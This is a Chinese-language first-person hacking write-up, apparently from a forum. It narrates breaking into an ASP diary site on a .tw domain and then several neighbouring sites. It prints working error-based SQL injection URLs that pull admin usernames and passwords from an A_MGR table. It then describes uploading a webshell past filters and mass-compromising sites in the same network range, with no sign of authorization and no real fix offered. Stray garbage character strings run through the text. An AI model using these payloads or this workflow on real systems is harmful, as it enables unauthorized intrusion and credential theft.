发现一个注入点
$ _; l) f/ k8 E ^' dhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389+ _3 H) V) f7 W: t+ \ L V6 F
# d) f( e1 i( b* t* ?
习惯性的加’having1=1--; c% o7 ]7 U7 [* V7 w* |
8 E: G; S! c1 @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—! C) |; k! x% e
; p" P. p) d7 A1 Q* f4 I" f( |
0
4 T0 t5 q$ Z: u0 N+ H, h( m Y5 S6 d: S( Z- I) i7 x& { `, x
爆出Diary_A.dl_Title(这时候很激动啊)
% G3 M, \' ?" l& H4 Z6 ?* ?/ a: e2 `8 V% ~: g6 U6 x' e: y
那么继续# w# z7 u# X" |# C
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
; m; ?# A E) N4 e Z2 e) E" f M3 P( X! f
继续,一直爆下去+ P0 z2 T# s: ^/ s* J
2 @& o9 u; e: {0 v/ F p' `爆到几个字段和表段 但是没找到需要的管理用户的字段
" \# l# \/ v# u( V* F# G8 ~
; f- ^9 a4 e& `" E& r0 Y蛋疼了 怎么办 然后去后台登陆页看源码
7 Y: f0 C- z9 u# X$ a+ Y, s- d
# F r) o2 @+ U0
7 {+ r) _3 g; w0 A/ K1 U8 f0 |
* C9 w+ ?) t( N1 {7 v6 u f) pInput name= “ADUID”
% { T: J: v e$ U. ~2 D/ VInput name= “ADPWD”
* c$ q/ s7 y* d# @* @$ { a1 |2 X% a. |0 w* q B
很幸运 找到了字段那就继续) S8 {0 v- k* K
找到之后开始爆用户
/ ?6 c: V3 K$ l- M- c* e6 _http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—, \( g% D; a% h6 c( I1 ^5 _$ a
爆密码: Y E1 Z- h# L9 z& C5 W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—( |0 z% F+ `, c4 v8 L/ {+ L8 T
测试了下 这个注入点只能爆到文章哪里的表
' J' Y7 ]. D1 W% G$ {. N9 e$ c% L2 u+ G" K. v n) L) V
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了; a2 q- T* E2 \( `
8 F$ u! J9 b, g/ W
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了- q3 O! \+ S$ z9 @. V; A
- a% ^$ g6 \% N V" E
473
! H9 v& J+ P s8 O) ~8 D
9 d" a( _8 x: I k进后台
6 B1 z; ~! v$ G; l
+ E; x+ Q! k1 ^& B6 W e {( C! R% e; M" ]6 n; _" K: ]
发现几个上传点 有的地方不能上传 而且防止恶意代码
4 t' \3 Z" G0 V& [+ ~' [9 [
+ z0 s% M9 y8 j6 b. h+ t没办法 各种百度各种找大牛 找到一只好像可以突破的马
( O- I' H/ u+ Y. I7 L& _- I+ E$ A3 F/ }3 T
6 E6 o$ A4 j' ^2 R在系统管理那里直接上传 不过没有显示地址
7 T) U% {* w" U8 Z
1 Q: t& F1 B% }' C4 ]6 J再上传一次 抓包 搞定OK* ~ H4 U& S. ~
; B" f! [* [- [# m \- _4 _5 o, Y( [) Z E/ W
M7 b B2 P* r. R$ p5 U1 ~472# g8 o0 r* K+ _& I6 s! \$ ?
! i2 k0 n" K2 R( g, `+ h
晚上不行了 去睡觉。。。) J. @) O3 d/ c6 m$ e0 K$ Z
第二天刚起床 闲的没事做继续日站吧
7 J( N6 l+ @. \0 |# M9 H0 ?6 P$ n; T
找个站 就把这个站的旁c扫了下9 ], T, }; ?* H4 k
; V! @) m! w" S3 q% x发现c段也有一个购物站 ,然后还和这个站的模板差不多
+ _& f1 g6 @0 D7 u2 O, t
1 q" ^* ]. \6 ]5 }& R9 m就找到会员登录口测试
3 ]' ~5 K7 U `! p8 f2 Y+ w+ j5 S* Y% G( R0 h& @
'and (select top 1 MGR_UID from A_MGR)>0—+ B4 G+ {) h' m1 _1 b
果断爆到了 这时候我很激动 通杀2 L/ [$ C" D: d; s/ D8 u% L8 S
9 F9 a2 V2 j# F: x" h! A0 t
再次翻c段8 u, k8 R8 [' w9 p. B/ ~$ i9 j
# h6 X& v' |# A! W+ O& q" ~翻出几个站 都成功拿下
+ \: l- [# f& H. f' E
2 }0 a/ S0 R c+ O
- q4 x$ f; T$ a4 U: ?
% C7 p# J7 `9 \9 a. s修复方案:% G# L1 h$ {# U I
他们比我专业
9 q, P; d; v' _! Y- D7 ^6 ^, i
, N* n) b% `; ?$ ]1 N; s& B# z! ^
9 \6 e& H& Z3 Z5 b% ?' Y1 N* R: j0 X: A7 x7 V* x
|